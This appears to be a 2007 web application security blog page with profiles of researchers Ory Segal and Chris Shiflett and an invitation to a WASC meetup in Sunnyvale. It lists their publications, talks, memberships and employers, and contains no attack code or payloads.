http://www.securityfocus.com/bid/6369


Tools:-

Ory has been actively developing parts of Watchfire AppScan and the PowerTools for a long time now, but other than that most of the tools are only used internally in Watchfire.


Contributions:-

MITRE CWE project
http://cwe.mitre.org/

WAFEC
http://www.webappsec.org/projects/wafec/

WASC Threat Classification
http://www.webappsec.org/projects/threat/



Memberships:-

Web Application Security Consortium


Blog:-

http://blog.watchfire.com


Education:-

BA in Computer Science from the Open Univ. of Israel.


Companies worked for:-

YTS Security Systems, Internet Gold, Avnet Data Security, Sanctum, Watchfire


Company working for:-

Watchfire


Email:-

osegal at watchfire dot com


Ory Segal is one of the most respected figures in web application security. I hope he starts his blog soon to share his ideas and thoughts more frequently with us.
Last Week - Chris Shiflett
Next Week – Nish Bhalla

Tuesday, April 10, 2007

WASC Meetup in bay area

It's a beerfest, guys. Put it on your calendar.

Normally we hold WASC Meet-Ups during large conferences (RSA/BlackHat) where a lot of web application security people are in the same place at the same time. Around the S.F. Bay Area there are enough webappsec people that we no longer need that excuse. So we're going to plan a WASC Meet-Up, inviting those in the local community to drop by. It'll be an informal event, maybe 15-30 people, no presentations or sponsors. Just like-minded people sharing food, drinks, and interesting conversation. Simply an opportunity to see people that we otherwise only communicate with virtually. Everyone is welcome. Please RSVP to Jeremiah if you plan on coming.

RSVP - contact__at__webappsec_dot_org

Time: Wed, April. 18 @ 6:00pm
Place:The Faultline (Sunnyvale)
http://www.faultlinebrewing.com/
1235 Oakmead Parkway
Sunnyvale, California, 94086
Tel:408/736-2739

See you all there!

Friday, April 06, 2007

Reflection on Chris Shiflett



This week on reflection we have Chris Shiflett, one of the very few people who have been blogging on webappsec for a long time, and I am sure his is amongst the top 10 most visited blogs on web application security. His knowledge of web application security is tremendous and his blog is a goldmine for people who are looking to learn and understand various types of web application vulnerabilities and their solutions. He has spoken at numerous conferences, published several articles and even written a few books.

Chris shares with us how he got started in the web application security field and how he got involved with the PHP Security Consortium. In his own words:

“I've been an avid web enthusiast since the early 90s, although the first couple of years were mostly spent exploring the technologies involved, particularly HTTP. Web application security is a natural extension of my ongoing desire to apply creativity to a solid fundamental understanding of technology. I started programming on a Commodore 64 in the early 80s, but it wasn't until the early 90s that I focused my attention on web technologies.

The PHP Security Consortium is a group of people whose focus is educating the PHP community about web application security. It began with a simple post on my blog in 2004 requesting assistance with some research I was conducting at the time. (I was researching worms that combine XSS and CSRF, an idea later brought to life by the Myspace worm.) To date, members of the PHP Security Consortium have written books and articles, spoken at industry-leading PHP and open source conferences, and collaborated on projects like the PHP Security Guide and PHPSecInfo. Very little of our work promotes the group itself, because our focus is helping people.

I'm an avid soccer fan. Living in New York provides me with the chance to play with skilled players from all over the world, so I spend almost every weekend in the park. My wife runs marathons and occasionally convinces me to run with her, but I prefer soccer. :-) “



Based out of Brooklyn, NY, USA, Chris is only 30 years old (I cannot believe so many leading people in the webappsec field are below 30, which is a very promising sign for the industry). Below are his contributions to the webappsec community.


Books:-

Essential PHP Security (O'Reilly, 2005)
http://phpsecurity.org/

HTTP Developer's Handbook (Sams, 2003)
http://shiflett.org/books

Contributions to other books

Programming PHP (O'Reilly 2006)
http://www.amazon.com/Programming-PHP-Rasmus-Lerdorf/dp/1565926102

PHP Cookbook (O'Reilly 2006)
http://www.oreilly.com/catalog/phpckbk2/

PHP in Action (Manning, 2007)
http://www.manning.com/reiersol/


Articles (WebAppSec only):-

Note: This is a subset of articles that are at least tangentially related to web application security.

The articles without a link were published in PHP Architect magazine and are available only upon subscription. The dates are mentioned along with the article (in case you want to look up that particular issue of the magazine). You can also find the information on his blog, though.

Security Corner: Security Testing - 19 Dec 2006

Security Corner: Cross-Domain Ajax - 16 Oct 2006

Security Corner: Understanding Superglobals - 25 Jul 2006

Security Corner: Character Encoding - 28 Feb 2006

Security Corner: Email Injection - 25 Jan 2006

Security Corner: Context - 22 Dec 2005

Security Corner: Cross-Site Scripting - 21 Nov 2005

Security Corner: HTTP Response Splitting - 25 Oct 2005

Security Corner: Code Audits - 21 Sep 2005

Security Corner: Theory - 18 Jul 2005

Security Corner: Persistent Logins - 25 May 2005

Security Corner: BBCode - 19 Apr 2005

Security Corner: Magic Quotes - 21 Mar 2005

Security Corner: PHP Security Consortium - 15 Feb 2005

Guru Speak: Storing Sessions in a Database
http://shiflett.org/articles/storing-sessions-in-a-database

Security Corner: Cross-Site Request Forgeries
http://shiflett.org/articles/cross-site-request-forgeries

Security Corner: Ideology
http://shiflett.org/articles/ideology

Guru Speak: How to Avoid "Page Has Expired" Warnings
http://shiflett.org/articles/how-to-avoid-page-has-expired-warnings

Security Corner: File Uploads
http://shiflett.org/articles/file-uploads

Security Corner: Secure Design
http://shiflett.org/articles/secure-design

Security Corner: Session Hijacking
http://shiflett.org/articles/session-hijacking

Security Corner: Form Spoofing
http://shiflett.org/articles/form-spoofing

Security Corner: Input Filtering
http://shiflett.org/articles/input-filtering

Security Corner: SQL Injection
http://shiflett.org/articles/sql-injection

Security Corner: Shared Hosting
http://shiflett.org/articles/shared-hosting

Security Corner: Session Fixation
http://shiflett.org/articles/session-fixation

The Truth about Sessions
http://shiflett.org/articles/the-truth-about-sessions

Foiling Cross-Site Attacks
http://shiflett.org/articles/foiling-cross-site-attacks

Passport Hacking Revisited
http://shiflett.org/articles/passport-hacking-revisited

Passport Hacking
http://shiflett.org/articles/passport-hacking


Lectures / Talks:-

References to almost all of the talks below can be found on Chris's blog. I tried to get the links, but every time I got sidetracked by something on his blog and eventually ran out of time. For the links, please check back again later, or you can search his blog (http://shiflett.org).

PHP Under Attack - OSCON (10 Jul 2003)

PHP Attacks and Defense – ApacheCon (19 Nov 2003)

PHP Security - OSCON (26 Jul 2004)

Foiling Cross-Site Attacks - OSCON (29 Jul 2004)

Securing PHP Sessions - OSCON (30 Jul 2004)

PHP Session Security - phpworks (23 Sep 2004)

Testing PHP with Perl - New York PHP (26 Oct 2004)

PHP Security - ApacheCon (14 Nov 2004)

Testing PHP with Perl - ApacheCon (16 Nov 2004)

PHP Security - PHP Quebec (30 Mar 2005)

PHP Security Briefing - PHP Quebec (01 Apr 2005)

PHP Security Briefing - NOAA SecCon (04 May 2005)

PHP Security by Example - phptropics (13 May 2005)

PHP Security Audit HOWTO - PHP West (11 Jun 2005)

PHP Security - ApacheCon Europe (19 Jul 2005)

PHP Security Briefing - ApacheCon Europe (21 Jul 2005)

Testing PHP with Perl - ApacheCon Europe (22 Jul 2005)

PHP Security - OSCON (01 Aug 2005)

PHP Security Briefing - OSCON (03 Aug 2005)

PHP by Example - phpworks (14 Sep 2005)

PHP Security by Example - phpworks (15 Sep 2005)

PHP Security Audit HOWTO - New York PHP (27 Sep 2005)

PHP Security Audit HOWTO - Boston PHP (06 Oct 2005)

PHP Security - ZendCon (18 Oct 2005)

PHP Security Audit HOWTO - ZendCon (21 Oct 2005)

Power PHP Testing - ApacheCon (11 Dec 2005)

Agile PHP Testing - PHP Quebec (31 Mar 2006)

What's New in PHP 5 - LinuxWorld (25 Apr 2006)

PHP Security - LinuxWorld (25 Apr 2006)

PHP Security - phptek (27 Apr 2006)

Zend Framework - Boston PHP (04 May 2006)

Essential PHP Security - ApacheCon Europe (27 Jun 2006)

The Truth about XSS - ApacheCon Europe (28 Jun 2006)

Agile PHP Testing - ApacheCon Europe (29 Jun 2006)

Power PHP Testing - OSCON (24 Jul 2006)

Essential PHP Security - OSCON (25 Jul 2006)

The Truth about XSS - OSCON (26 Jul 2006)

PHP Security Testing - OSCON (27 Jul 2006)

The Truth about XSS - phpworks (13 Sep 2006)

Agile PHP Testing - phpworks (13 Sep 2006)

PHP Security Audit HOWTO - EuroOSCON (21 Sep 2006)

PHP Security Testing - DC PHP Con (19 Oct 2006)

The Truth about XSS - DC PHP Con (19 Oct 2006)

Essential PHP Security - ZendCon (30 Oct 2006)

Security 2.0 - Web Builder 2.0 (05 Dec 2006)

The Truth about Sessions - PHP Quebec (15 Mar 2007)


Memberships:-

PHP Security Consortium (Founder)
http://phpsec.org/

Open Web Application Security Project
http://owasp.org/

Web Application Security Consortium
http://webappsec.org/


Companies worked for:-

USPS, eDonkey, Brain Bulb, OmniTI


Company working for:-

OmniTI (Principal)
http://omniti.com/


Email:-

http://shiflett.org/contact


Blog:-

http://shiflett.org/


Websites:-

Personal -

http://shiflett.org/

Work -

Omni TI
http://omniti.com/

PHP Security Consortium
http://phpsec.org/

Essential PHP Security
http://phpsecurity.org/


Education:-

BS in Computer Science


If you haven’t been to his blog yet, then I would strongly recommend visiting it soon, as you will find a plethora of information on webappsec. Every webappsec enthusiast should have it on their watchlist.

Last Week - Jeff Williams
Next Week - Ory Segal